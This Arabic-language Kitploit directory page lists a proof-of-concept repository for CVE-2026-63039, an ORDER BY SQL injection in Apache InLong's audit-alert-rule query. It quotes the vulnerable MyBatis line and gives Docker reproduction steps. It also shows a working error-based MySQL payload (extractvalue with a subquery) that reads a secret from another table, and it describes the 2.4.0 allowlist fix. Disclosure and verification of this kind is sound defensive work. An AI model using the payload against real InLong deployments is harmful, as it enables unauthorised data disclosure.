Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-63039 — إثبات مفهوم لـ CVE-2026-63039، يوضح حقن SQL من نوع ORDER BY في AuditAlertRule الخاص بـ Apache InLong عبر orderField/orderType، مع أداة إعادة إنتاج قائمة على Docker والتحقق من الإصلاح. | Kitploit
أدوات/GitHubGitHub/oscerd/cve-2026-63039
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالأوراق والأبحاثالتعلم والتعليم
GitHuboscerd/cve-2026-63039

CVE-2026-63039

إثبات مفهوم لـ CVE-2026-63039، يوضح حقن SQL من نوع ORDER BY في AuditAlertRule الخاص بـ Apache InLong عبر orderField/orderType، مع أداة إعادة إنتاج قائمة على Docker والتحقق من الإصلاح.

عرض المستودع
منذ 8س 34دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-63039 — Apache InLong AuditAlertRule: حقن SQL عبر ORDER BY

مُعيد إنتاج (reproducer) قابل للتشغيل لإثبات المفهوم (PoC) لثغرة حقن SQL في استعلام audit-alert-rule في Apache InLong.

يقوم مُخطِّط InLong manager، AuditAlertRuleEntityMapper.selectByCondition، بالتصفية باستخدام معاملات MyBatis الآمنة #{}، لكنه يرتّب عبر استيفاء نصي ${} لحقلين من حقول الطلب:

root@kitploit:~
<!-- inlong-manager/manager-dao/src/main/resources/mappers/AuditAlertRuleEntityMapper.xml  (InLong 2.0.0–2.3.x) -->
order by ${request.orderField} ${request.orderType}

يأتي orderField و orderType من الطلب المُقسَّم إلى صفحات (AuditAlertRulePageRequest)، وبالتالي يكونان تحت سيطرة المهاجم ويُدمجان حرفيًا في استعلام SQL — مما يؤدي إلى حقن SQL في جملة ORDER BY (CWE-89). يحقن هذا الـ PoC حمولة MySQL قائمة على الأخطاء (error-based) في orderField ويقرأ سرًا من جدول غير مرتبط، مما يوضح كشفًا تعسفيًا للبيانات.

التشغيل

root@kitploit:~
mvn -q -DskipTests package
docker compose up --build     # starts MySQL, seeds it, runs the one-shot PoC
docker compose down -v

المخرجات المتوقعة على مسار الكود المعرّض للثغرة:

root@kitploit:~
[1] Benign request (orderField='id', orderType='ASC'): 3 rows
      AuditAlertRule{id=1, inlongGroupId=group_a, alertName=latency rule}
      ...
[2] Malicious request (orderField = error-based payload):
      orderField = extractvalue(1,concat(0x7e,(select secret_value from manager_secrets limit 1)))
      extracted from another table via the injected subquery: INLONG-SECRET-63039
>>> PROVEN: ... ORDER BY SQL injection (CWE-89): true

ملخص الثغرة

الإصلاح

يقوم Apache InLong 2.4.0 بالتحقق من orderField / orderType مقابل قائمة سماح (allowlist) من الأعمدة والاتجاهات القابلة للفرز المعروفة قبل وصولها إلى الـ mapper (لا يمكن ربط اسم عمود ORDER BY كمعامل #{}، لذلك يجب التحقق من مدخلات الفرز بدلاً من معاملتها كمعاملات).

إنّ الـ MyBatis mapper والكيان (entity) وpojo الطلب في هذا المستودع تعكس النسخ الأصلية من InLong بحيث يُعاد إنتاج موضع الحقن (order by ${request.orderField} ${request.orderType}) حرفيًا.

إخلاء مسؤولية

تم نشر هذا المستودع لأغراض تعليمية ودفاعية: لمساعدة مستخدمي Apache InLong على فهم الثغرة، والتحقق مما إذا كانوا متأثرين بها، والتأكد من أن الترقية تحلّها. تقرأ الحمولة سرًا تجريبيًا فقط من جدول محلي. لا تستخدم هذه المواد ضد أنظمة لا تملكها أو لا تديرها.

تنزيل الأداة
الخاصيةالقيمة
المشروعApache InLong — manager (AuditAlertRuleService / AuditAlertRuleEntityMapper)
التصنيفCWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
متجه الهجومحقلا orderField / orderType في طلب صفحة audit-alert-rule
الأثرتنفيذ SQL تعسفي / كشف بيانات ضد قاعدة بيانات InLong manager
الإصدارات المتأثرةمن 2.0.0 حتى ما قبل 2.4.0
الإصدار المُصلَح2.4.0
النشرة الأمنيةCVE-2026-63039
الفضلAndrea Cosentino